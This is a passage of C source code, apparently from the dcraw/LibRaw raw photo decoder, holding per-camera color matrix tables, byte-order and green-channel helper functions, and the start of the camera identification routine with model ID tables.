{ 8238,-3244,-679,-3921,11814,2384,-836,2022,5852 } },
{ "Panasonic DMC-GX1", -15, 0,
{ 6763,-1919,-863,-3868,11515,2684,-1216,2387,5879 } },
{ "Panasonic DMC-GX85", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX80", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX7MK2", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX7", -15,0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GX8", -15,0,
{ 7564,-2263,-606,-3148,11239,2177,-540,1435,4853 } },
{ "Panasonic DMC-TZ6", -15, 0, /* markets: ZS40 TZ60 TZ61 */
{ 8607,-2822,-808,-3755,11930,2049,-820,2060,5224 } },
{ "Panasonic DMC-TZ8", -15, 0, /* markets: ZS60 TZ80 TZ81 TZ85 */
{ 8550,-2908,-842,-3195,11529,1881,-338,1603,4631 } },
{ "Panasonic DMC-ZS4", -15, 0, /* markets: ZS40 TZ60 TZ61 */
{ 8607,-2822,-808,-3755,11930,2049,-820,2060,5224 } },
{ "Panasonic DMC-TZ7", -15, 0, /* markets: ZS50 TZ70 TZ71 */
{ 8802,-3135,-789,-3151,11468,1904,-550,1745,4810 } },
{ "Panasonic DMC-ZS5", -15, 0, /* markets: ZS50 TZ70 TZ71 */
{ 8802,-3135,-789,-3151,11468,1904,-550,1745,4810 } },
{ "Panasonic DMC-ZS6", -15, 0, /* markets: ZS60 TZ80 TZ81 TZ85 */
{ 8550,-2908,-842,-3195,11529,1881,-338,1603,4631 } },
{ "Panasonic DMC-ZS100", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-ZS110", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ100", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ101", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ110", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TX1", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Leica S (Typ 007)", 0, 0,
{ 6063,-2234,-231,-5210,13787,1500,-1043,2866,6997 } },
{ "Leica X", 0, 0, /* X and X-U, both (Typ 113) */
{ 7712,-2059,-653,-3882,11494,2726,-710,1332,5958 } },
{ "Leica Q (Typ 116)", 0, 0,
{ 11865,-4523,-1441,-5423,14458,935,-1587,2687,4830 } },
{ "Leica M (Typ 262)", 0, 0,
{ 6653,-1486,-611,-4221,13303,929,-881,2416,7226 } },
{ "Leica SL (Typ 601)", 0, 0,
{ 11865,-4523,-1441,-5423,14458,935,-1587,2687,4830} },
{ "Phase One H 20", 0, 0, /* DJC */
{ 1313,1855,-109,-6715,15908,808,-327,1840,6020 } },
{ "Phase One H 25", 0, 0,
{ 2905,732,-237,-8134,16626,1476,-3038,4253,7517 } },
{ "Phase One IQ250",0, 0,
{ 4396,-153,-249,-5267,12249,2657,-1397,2323,6014 } },
{ "Phase One P 2", 0, 0,
{ 2905,732,-237,-8134,16626,1476,-3038,4253,7517 } },
{ "Phase One P 30", 0, 0,
{ 4516,-245,-37,-7020,14976,2173,-3206,4671,7087 } },
{ "Phase One P 45", 0, 0,
{ 5053,-24,-117,-5684,14076,1702,-2619,4492,5849 } },
{ "Phase One P40", 0, 0,
{ 8035,435,-962,-6001,13872,2320,-1159,3065,5434 } },
{ "Phase One P65", 0, 0,
{ 8035,435,-962,-6001,13872,2320,-1159,3065,5434 } },
{ "Photron BC2-HD", 0, 0, /* DJC */
{ 14603,-4122,-528,-1810,9794,2017,-297,2763,5936 } },
{ "Red One", 704, 0xffff, /* DJC */
{ 21014,-7891,-2613,-3056,12201,856,-2203,5125,8042 } },
{ "Ricoh GR II", 0, 0,
{ 4630,-834,-423,-4977,12805,2417,-638,1467,6115 } },
{ "Ricoh GR", 0, 0,
{ 3708,-543,-160,-5381,12254,3556,-1471,1929,8234 } },
{ "Samsung EK-GN120", 0, 0, /* Adobe; Galaxy NX */
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung EX1", 0, 0x3e00,
{ 8898,-2498,-994,-3144,11328,2066,-760,1381,4576 } },
{ "Samsung EX2F", 0, 0x7ff,
{ 10648,-3897,-1055,-2022,10573,1668,-492,1611,4742 } },
{ "Samsung NX mini", 0, 0,
{ 5222,-1196,-550,-6540,14649,2009,-1666,2819,5657 } },
{ "Samsung NX3300", 0, 0, /* same as NX3000 */
{ 8060,-2933,-761,-4504,12890,1762,-630,1489,5227 } },
{ "Samsung NX3000", 0, 0,
{ 8060,-2933,-761,-4504,12890,1762,-630,1489,5227 } },
{ "Samsung NX30", 0, 0, /* NX30, NX300, NX300M */
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung NX2000", 0, 0,
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung NX2", 0, 0xfff, /* NX20, NX200, NX210 */
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX1000", 0, 0,
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX1100", 0, 0,
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX11", 0, 0,
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX10", 0, 0, /* also NX100 */
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX500", 0, 0,
{ 10686,-4042,-1052,-3595,13238,276,-464,1259,5931 } },
{ "Samsung NX5", 0, 0,
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX1", 0, 0,
{ 10686,-4042,-1052,-3595,13238,276,-464,1259,5931 } },
{ "Samsung WB2000", 0, 0xfff,
{ 12093,-3557,-1155,-1000,9534,1733,-22,1787,4576 } },
{ "Samsung GX-1", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Samsung GX20", 0, 0, /* copied from Pentax K20D */
{ 9427,-2714,-868,-7493,16092,1373,-2199,3264,7180 } },
{ "Samsung S85", 0, 0, /* DJC */
{ 11885,-3968,-1473,-4214,12299,1916,-835,1655,5549 } },
// Foveon: LibRaw color data
{ "Sigma dp0 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp1 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp2 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp3 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma sd Quattro H", 256, 0,
{1295,108,-311, 256,828,-65,-28,750,254}}, /* temp, same as sd Quattro */
{ "Sigma sd Quattro", 2047, 0,
{1295,108,-311, 256,828,-65,-28,750,254}}, /* temp */
{ "Sigma SD9", 15, 4095, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD10", 15, 16383, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD14", 15, 16383, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD15", 15, 4095, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
// Merills + SD1
{ "Sigma SD1", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP1 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP2 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP3 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
// Sigma DP (non-Merill Versions)
{ "Sigma DP", 0, 4095, /* LibRaw */
// { 7401,-1169,-567,2059,3769,1510,664,3367,5328 } },
{ 13100,-3638,-847,6855,2369,580,2723,3218,3251 } },
{ "Sinar", 0, 0, /* DJC */
{ 16442,-2956,-2422,-2877,12128,750,-1136,6066,4559 } },
{ "Sony DSC-F828", 0, 0,
{ 7924,-1910,-777,-8226,15459,2998,-1517,2199,6818,-7242,11401,3481 } },
{ "Sony DSC-R1", 0, 0,
{ 8512,-2641,-694,-8042,15670,2526,-1821,2117,7414 } },
{ "Sony DSC-V3", 0, 0,
{ 7511,-2571,-692,-7894,15088,3060,-948,1111,8128 } },
{"Sony DSC-RX100M5", -800, 0, /* Adobe */
{6596, -2079, -562, -4782, 13016, 1933, -970, 1581, 5181 }},
{ "Sony DSC-RX100M", -800, 0, /* M2 and M3 and M4 */
{ 6596,-2079,-562,-4782,13016,1933,-970,1581,5181 } },
{ "Sony DSC-RX100", 0, 0,
{ 8651,-2754,-1057,-3464,12207,1373,-568,1398,4434 } },
{ "Sony DSC-RX10",0, 0, /* And M2/M3 too */
{ 6679,-1825,-745,-5047,13256,1953,-1580,2422,5183 } },
{ "Sony DSC-RX1RM2", 0, 0,
{ 6629,-1900,-483,-4618,12349,2550,-622,1381,6514 } },
{ "Sony DSC-RX1R", 0, 0,
{ 8195,-2800,-422,-4261,12273,1709,-1505,2400,5624 } },
{ "Sony DSC-RX1", 0, 0,
{ 6344,-1612,-462,-4863,12477,2681,-865,1786,6899 } },
{ "Sony DSLR-A100", 0, 0xfeb,
{ 9437,-2811,-774,-8405,16215,2290,-710,596,7181 } },
{ "Sony DSLR-A290", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A2", 0, 0,
{ 9847,-3091,-928,-8485,16345,2225,-715,595,7103 } },
{ "Sony DSLR-A300", 0, 0,
{ 9847,-3091,-928,-8485,16345,2225,-715,595,7103 } },
{ "Sony DSLR-A330", 0, 0,
{ 9847,-3091,-929,-8485,16346,2225,-714,595,7103 } },
{ "Sony DSLR-A350", 0, 0xffc,
{ 6038,-1484,-578,-9146,16746,2513,-875,746,7217 } },
{ "Sony DSLR-A380", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A390", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A450", 0, 0xfeb,
{ 4950,-580,-103,-5228,12542,3029,-709,1435,7371 } },
{ "Sony DSLR-A580", 0, 0xfeb,
{ 5932,-1492,-411,-4813,12285,2856,-741,1524,6739 } },
{ "Sony DSLR-A500", 0, 0xfeb,
{ 6046,-1127,-278,-5574,13076,2786,-691,1419,7625 } },
{ "Sony DSLR-A5", 0, 0xfeb,
{ 4950,-580,-103,-5228,12542,3029,-709,1435,7371 } },
{ "Sony DSLR-A700", 0, 0,
{ 5775,-805,-359,-8574,16295,2391,-1943,2341,7249 } },
{ "Sony DSLR-A850", 0, 0,
{ 5413,-1162,-365,-5665,13098,2866,-608,1179,8440 } },
{ "Sony DSLR-A900", 0, 0,
{ 5209,-1072,-397,-8845,16120,2919,-1618,1803,8654 } },
{ "Sony ILCA-68", 0, 0,
{ 6435,-1903,-536,-4722,12449,2550,-663,1363,6517 } },
{ "Sony ILCA-77M2", 0, 0,
{ 5991,-1732,-443,-4100,11989,2381,-704,1467,5992 } },
{ "Sony ILCA-99M2", 0, 0, /* Adobe */
{ 6660, -1918, -471, -4613, 12398, 2485, -649, 1433, 6447}},
{ "Sony ILCE-7M2", 0, 0,
{ 5271,-712,-347,-6153,13653,2763,-1601,2366,7242 } },
{ "Sony ILCE-7SM2", 0, 0,
{ 5838,-1430,-246,-3497,11477,2297,-748,1885,5778 } },
{ "Sony ILCE-7S", 0, 0,
{ 5838,-1430,-246,-3497,11477,2297,-748,1885,5778 } },
{ "Sony ILCE-7RM2", 0, 0,
{ 6629,-1900,-483,-4618,12349,2550,-622,1381,6514 } },
{ "Sony ILCE-7R", 0, 0,
{ 4913,-541,-202,-6130,13513,2906,-1564,2151,7183 } },
{ "Sony ILCE-7", 0, 0,
{ 5271,-712,-347,-6153,13653,2763,-1601,2366,7242 } },
{ "Sony ILCE-6300", 0, 0,
{ 5973,-1695,-419,-3826,11797,2293,-639,1398,5789 } },
{ "Sony ILCE-6500", 0, 0, /* Adobe */
{ 5973,-1695,-419,-3826,11797,2293,-639,1398,5789 } },
{ "Sony ILCE", 0, 0, /* 3000, 5000, 5100, 6000, and QX1 */
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony NEX-5N", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony NEX-5R", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-5T", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-3N", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-3", 0, 0, /* Adobe */
{ 6549,-1550,-436,-4880,12435,2753,-854,1868,6976 } },
{ "Sony NEX-5", 0, 0, /* Adobe */
{ 6549,-1550,-436,-4880,12435,2753,-854,1868,6976 } },
{ "Sony NEX-6", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-7", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony NEX", 0, 0, /* NEX-C3, NEX-F3 */
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A33", 0, 0,
{ 6069,-1221,-366,-5221,12779,2734,-1024,2066,6834 } },
{ "Sony SLT-A35", 0, 0,
{ 5986,-1618,-415,-4557,11820,3120,-681,1404,6971 } },
{ "Sony SLT-A37", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A55", 0, 0,
{ 5932,-1492,-411,-4813,12285,2856,-741,1524,6739 } },
{ "Sony SLT-A57", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A58", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A65", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony SLT-A77", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony SLT-A99", 0, 0,
{ 6344,-1612,-462,-4863,12477,2681,-865,1786,6899 } },
};
double cam_xyz[4][3];
char name[130];
int i, j;
if(colors>4 || colors < 1) return;
int bl4=(cblack[0]+cblack[1]+cblack[2]+cblack[3])/4,bl64=0;
if(cblack[4]*cblack[5]>0)
{
for (unsigned c = 0; c < 4096 && c < cblack[4]*cblack[5]; c++)
bl64+=cblack[c+6];
bl64 /= cblack[4]*cblack[5];
}
int rblack = black+bl4+bl64;
sprintf (name, "%s %s", t_make, t_model);
for (i=0; i < sizeof table / sizeof *table; i++)
if (!strncasecmp(name, table[i].prefix, strlen(table[i].prefix))) {
if(!dng_version)
{
if (table[i].t_black>0)
{
black = (ushort) table[i].t_black;
memset(cblack,0,sizeof(cblack));
}
else if(table[i].t_black <0 && rblack == 0 )
{
black = (ushort) (-table[i].t_black);
memset(cblack,0,sizeof(cblack));
}
if (table[i].t_maximum)
maximum = (ushort) table[i].t_maximum;
}
if (table[i].trans[0]) {
for (raw_color = j=0; j < 12; j++)
#ifdef LIBRAW_LIBRARY_BUILD
if(internal_only)
imgdata.color.cam_xyz[0][j] = table[i].trans[j] / 10000.0;
else
imgdata.color.cam_xyz[0][j] =
#endif
((double*)cam_xyz)[j] = table[i].trans[j] / 10000.0;
#ifdef LIBRAW_LIBRARY_BUILD
if(!internal_only)
#endif
cam_xyz_coeff (rgb_cam, cam_xyz);
}
break;
}
}
void CLASS simple_coeff (int index)
{
static const float table[][12] = {
/* index 0 -- all Foveon cameras */
{ 1.4032,-0.2231,-0.1016,-0.5263,1.4816,0.017,-0.0112,0.0183,0.9113 },
/* index 1 -- Kodak DC20 and DC25 */
{ 2.25,0.75,-1.75,-0.25,-0.25,0.75,0.75,-0.25,-0.25,-1.75,0.75,2.25 },
/* index 2 -- Logitech Fotoman Pixtura */
{ 1.893,-0.418,-0.476,-0.495,1.773,-0.278,-1.017,-0.655,2.672 },
/* index 3 -- Nikon E880, E900, and E990 */
{ -1.936280, 1.800443, -1.448486, 2.584324,
1.405365, -0.524955, -0.289090, 0.408680,
-1.204965, 1.082304, 2.941367, -1.818705 }
};
int i, c;
for (raw_color = i=0; i < 3; i++)
FORCC rgb_cam[i][c] = table[index][i*colors+c];
}
short CLASS guess_byte_order (int words)
{
uchar test[4][2];
int t=2, msb;
double diff, sum[2] = {0,0};
fread (test[0], 2, 2, ifp);
for (words-=2; words--; ) {
fread (test[t], 2, 1, ifp);
for (msb=0; msb < 2; msb++) {
diff = (test[t^2][msb] << 8 | test[t^2][!msb])
- (test[t ][msb] << 8 | test[t ][!msb]);
sum[msb] += diff*diff;
}
t = (t+1) & 3;
}
return sum[0] < sum[1] ? 0x4d4d : 0x4949;
}
float CLASS find_green (int bps, int bite, int off0, int off1)
{
UINT64 bitbuf=0;
int vbits, col, i, c;
ushort img[2][2064];
double sum[] = {0, 0};
if(width > 2064) return 0.f; // too wide
FORC(2) {
fseek (ifp, c ? off1:off0, SEEK_SET);
for (vbits=col=0; col < width; col++) {
for (vbits -= bps; vbits < 0; vbits += bite) {
bitbuf <<= bite;
for (i=0; i < bite; i+=8)
bitbuf |= (unsigned) (fgetc(ifp) << i);
}
img[c][col] = bitbuf << (64-bps-vbits) >> (64-bps);
}
}
FORC(width-1) {
sum[ c & 1] += ABS(img[0][c]-img[1][c+1]);
sum[~c & 1] += ABS(img[1][c]-img[0][c+1]);
}
return 100 * log(sum[0]/sum[1]);
}
#ifdef LIBRAW_LIBRARY_BUILD
static void remove_trailing_spaces(char *string, size_t len)
{
if (len < 1)
return; // not needed, b/c sizeof of make/model is 64
string[len - 1] = 0;
if (len < 3)
return; // also not needed
len = strnlen(string, len - 1);
for (int i = len - 1; i >= 0; i--)
{
if (isspace((unsigned char)string[i]))
string[i] = 0;
else
break;
}
}
#endif
/*
Identify which camera created this file, and set global variables
accordingly.
*/
void CLASS identify()
{
static const short pana[][6] = {
{ 3130, 1743, 4, 0, -6, 0 },
{ 3130, 2055, 4, 0, -6, 0 },
{ 3130, 2319, 4, 0, -6, 0 },
{ 3170, 2103, 18, 0,-42, 20 },
{ 3170, 2367, 18, 13,-42,-21 },
{ 3177, 2367, 0, 0, -1, 0 },
{ 3304, 2458, 0, 0, -1, 0 },
{ 3330, 2463, 9, 0, -5, 0 },
{ 3330, 2479, 9, 0,-17, 4 },
{ 3370, 1899, 15, 0,-44, 20 },
{ 3370, 2235, 15, 0,-44, 20 },
{ 3370, 2511, 15, 10,-44,-21 },
{ 3690, 2751, 3, 0, -8, -3 },
{ 3710, 2751, 0, 0, -3, 0 },
{ 3724, 2450, 0, 0, 0, -2 },
{ 3770, 2487, 17, 0,-44, 19 },
{ 3770, 2799, 17, 15,-44,-19 },
{ 3880, 2170, 6, 0, -6, 0 },
{ 4060, 3018, 0, 0, 0, -2 },
{ 4290, 2391, 3, 0, -8, -1 },
{ 4330, 2439, 17, 15,-44,-19 },
{ 4508, 2962, 0, 0, -3, -4 },
{ 4508, 3330, 0, 0, -3, -6 },
};
static const ushort canon[][11] = {
{ 1944, 1416, 0, 0, 48, 0 },
{ 2144, 1560, 4, 8, 52, 2, 0, 0, 0, 25 },
{ 2224, 1456, 48, 6, 0, 2 },
{ 2376, 1728, 12, 6, 52, 2 },
{ 2672, 1968, 12, 6, 44, 2 },
{ 3152, 2068, 64, 12, 0, 0, 16 },
{ 3160, 2344, 44, 12, 4, 4 },
{ 3344, 2484, 4, 6, 52, 6 },
{ 3516, 2328, 42, 14, 0, 0 },
{ 3596, 2360, 74, 12, 0, 0 },
{ 3744, 2784, 52, 12, 8, 12 },
{ 3944, 2622, 30, 18, 6, 2 },
{ 3948, 2622, 42, 18, 0, 2 },
{ 3984, 2622, 76, 20, 0, 2, 14 },
{ 4104, 3048, 48, 12, 24, 12 },
{ 4116, 2178, 4, 2, 0, 0 },
{ 4152, 2772, 192, 12, 0, 0 },
{ 4160, 3124, 104, 11, 8, 65 },
{ 4176, 3062, 96, 17, 8, 0, 0, 16, 0, 7, 0x49 },
{ 4192, 3062, 96, 17, 24, 0, 0, 16, 0, 0, 0x49 },
{ 4312, 2876, 22, 18, 0, 2 },
{ 4352, 2874, 62, 18, 0, 0 },
{ 4476, 2954, 90, 34, 0, 0 },
{ 4480, 3348, 12, 10, 36, 12, 0, 0, 0, 18, 0x49 },
{ 4480, 3366, 80, 50, 0, 0 },
{ 4496, 3366, 80, 50, 12, 0 },
{ 4768, 3516, 96, 16, 0, 0, 0, 16 },
{ 4832, 3204, 62, 26, 0, 0 },
{ 4832, 3228, 62, 51, 0, 0 },
{ 5108, 3349, 98, 13, 0, 0 },
{ 5120, 3318, 142, 45, 62, 0 },
{ 5280, 3528, 72, 52, 0, 0 }, /* EOS M */
{ 5344, 3516, 142, 51, 0, 0 },
{ 5344, 3584, 126,100, 0, 2 },
{ 5360, 3516, 158, 51, 0, 0 },
{ 5568, 3708, 72, 38, 0, 0 },
{ 5632, 3710, 96, 17, 0, 0, 0, 16, 0, 0, 0x49 },
{ 5712, 3774, 62, 20, 10, 2 },
{ 5792, 3804, 158, 51, 0, 0 },
{ 5920, 3950, 122, 80, 2, 0 },
{ 6096, 4056, 72, 34, 0, 0 }, /* EOS M3 */
{ 6288, 4056, 266, 36, 0, 0 }, /* EOS 80D */
{ 6880, 4544, 136, 42, 0, 0 }, /* EOS 5D4 */
{ 8896, 5920, 160, 64, 0, 0 },
};
static const struct {
ushort id;
char t_model[20];
} unique[] = {
{ 0x001, "EOS-1D" },
{ 0x167, "EOS-1DS" },
{ 0x168, "EOS 10D" },
{ 0x169, "EOS-1D Mark III" },
{ 0x170, "EOS 300D" },
{ 0x174, "EOS-1D Mark II" },
{ 0x175, "EOS 20D" },
{ 0x176, "EOS 450D" },
{ 0x188, "EOS-1Ds Mark II" },
{ 0x189, "EOS 350D" },
{ 0x190, "EOS 40D" },
{ 0x213, "EOS 5D" },
{ 0x215, "EOS-1Ds Mark III" },
{ 0x218, "EOS 5D Mark II" },
{ 0x232, "EOS-1D Mark II N" },
{ 0x234, "EOS 30D" },
{ 0x236, "EOS 400D" },
{ 0x250, "EOS 7D" },
{ 0x252, "EOS 500D" },
{ 0x254, "EOS 1000D" },
{ 0x261, "EOS 50D" },
{ 0x269, "EOS-1D X" },
{ 0x270, "EOS 550D" },
{ 0x281, "EOS-1D Mark IV" },
{ 0x285, "EOS 5D Mark III" },
{ 0x286, "EOS 600D" },
{ 0x287, "EOS 60D" },
{ 0x288, "EOS 1100D" },
{ 0x289, "EOS 7D Mark II" },
{ 0x301, "EOS 650D" },
{ 0x302, "EOS 6D" },
{ 0x324, "EOS-1D C" },
{ 0x325, "EOS 70D" },
{ 0x326, "EOS 700D" },
{ 0x327, "EOS 1200D" },
{ 0x328, "EOS-1D X Mark II" },
{ 0x331, "EOS M" },
{ 0x335, "EOS M2" },
{ 0x374, "EOS M3"}, /* temp */
{ 0x384, "EOS M10"}, /* temp */
{ 0x394, "EOS M5"}, /* temp */
{ 0x346, "EOS 100D" },
{ 0x347, "EOS 760D" },
{ 0x349, "EOS 5D Mark IV" },
{ 0x350, "EOS 80D"},
{ 0x382, "EOS 5DS" },
{ 0x393, "EOS 750D" },
{ 0x401, "EOS 5DS R" },
{ 0x404, "EOS 1300D" },
}, sonique[] = {
{ 0x002, "DSC-R1" },
{ 0x100, "DSLR-A100" },
{ 0x101, "DSLR-A900" },
{ 0x102, "DSLR-A700" },
{ 0x103, "DSLR-A200" },
{ 0x104, "DSLR-A350" },
{ 0x105, "DSLR-A300" },
{ 0x106, "DSLR-A900" },
{ 0x107, "DSLR-A380" },
{ 0x108, "DSLR-A330" },
{ 0x109, "DSLR-A230" },
{ 0x10a, "DSLR-A290" },
{ 0x10d, "DSLR-A850" },
{ 0x10e, "DSLR-A850" },
{ 0x111, "DSLR-A550" },
{ 0x112, "DSLR-A500" },
{ 0x113, "DSLR-A450" },
{ 0x116, "NEX-5" },
{ 0x117, "NEX-3" },
{ 0x118, "SLT-A33" },
{ 0x119, "SLT-A55V" },
{ 0x11a, "DSLR-A560" },
{ 0x11b, "DSLR-A580" },
{ 0x11c, "NEX-C3" },
{ 0x11d, "SLT-A35" },
{ 0x11e, "SLT-A65V" },
{ 0x11f, "SLT-A77V" },
{ 0x120, "NEX-5N" },
{ 0x121, "NEX-7" },
{ 0x122, "NEX-VG20E"},
{ 0x123, "SLT-A37" },
{ 0x124, "SLT-A57" },
{ 0x125, "NEX-F3" },
{ 0x126, "SLT-A99V" },
{ 0x127, "NEX-6" },
{ 0x128, "NEX-5R" },
{ 0x129, "DSC-RX100" },
{ 0x12a, "DSC-RX1" },
{ 0x12b, "NEX-VG900" },
{ 0x12c, "NEX-VG30E" },
{ 0x12e, "ILCE-3000" },
{ 0x12f, "SLT-A58" },
{ 0x131, "NEX-3N" },
{ 0x132, "ILCE-7" },
{ 0x133, "NEX-5T" },
{ 0x134, "DSC-RX100M2" },
{ 0x135, "DSC-RX10" },
{ 0x136, "DSC-RX1R" },
{ 0x137, "ILCE-7R" },
{ 0x138, "ILCE-6000" },
{ 0x139, "ILCE-5000" },
{ 0x13d, "DSC-RX100M3" },
{ 0x13e, "ILCE-7S" },
{ 0x13f, "ILCA-77M2" },
{ 0x153, "ILCE-5100" },
{ 0x154, "ILCE-7M2" },
{ 0x155, "DSC-RX100M4" },
{ 0x156, "DSC-RX10M2" },
{ 0x158, "DSC-RX1RM2" },
{ 0x15a, "ILCE-QX1" },
{ 0x15b, "ILCE-7RM2" },
{ 0x15e, "ILCE-7SM2" },
{ 0x161, "ILCA-68" },
{ 0x162, "ILCA-99M2" },
{ 0x163, "DSC-RX10M3" },
{ 0x164, "DSC-RX100M5"},
{ 0x165, "ILCE-6300" },
{ 0x168, "ILCE-6500"},
};
#ifdef LIBRAW_LIBRARY_BUILD
static const libraw_custom_camera_t
const_table[]
#else
static const struct {
unsigned fsize;
ushort rw, rh;
uchar lm, tm, rm, bm, lf, cf, max, flags;
char t_make[10], t_model[20];
ushort offset;
}
table[]
#endif
= {
{ 786432,1024, 768, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-080C" },
{ 1447680,1392,1040, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-145C" },
{ 1920000,1600,1200, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-201C" },
{ 5067304,2588,1958, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-510C" },
{ 5067316,2588,1958, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-510C",12 },
{ 10134608,2588,1958, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-510C" },
{ 10134620,2588,1958, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-510C",12 },
{ 16157136,3272,2469, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-810C" },
{ 15980544,3264,2448, 0, 0, 0, 0, 8,0x61,0,1,"AgfaPhoto","DC-833m" },
{ 9631728,2532,1902, 0, 0, 0, 0,96,0x61,0,0,"Alcatel","5035D" },
{ 31850496,4608,3456, 0, 0, 0, 0,0,0x94,0,0,"GITUP","GIT2 4:3" },
{ 23887872,4608,2592, 0, 0, 0, 0,0,0x94,0,0,"GITUP","GIT2 16:9" },
// Android Raw dumps id start
// File Size in bytes Horizontal Res Vertical Flag then bayer order eg 0x16 bbgr 0x94 rggb
{ 1540857,2688,1520, 0, 0, 0, 0, 1,0x61,0,0,"Samsung","S3" },
{ 2658304,1212,1096, 0, 0, 0, 0, 1 ,0x16,0,0,"LG","G3FrontMipi" },
{ 2842624,1296,1096, 0, 0, 0, 0, 1 ,0x16,0,0,"LG","G3FrontQCOM" },
{ 2969600,1976,1200, 0, 0, 0, 0, 1 ,0x16,0,0,"Xiaomi","MI3wMipi" },
{ 3170304,1976,1200, 0, 0, 0, 0, 1 ,0x16,0,0,"Xiaomi","MI3wQCOM" },
{ 3763584,1584,1184, 0, 0, 0, 0, 96,0x61,0,0,"I_Mobile","I_StyleQ6" },
{ 5107712,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","UltraPixel1" },
{ 5382640,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","UltraPixel2" },
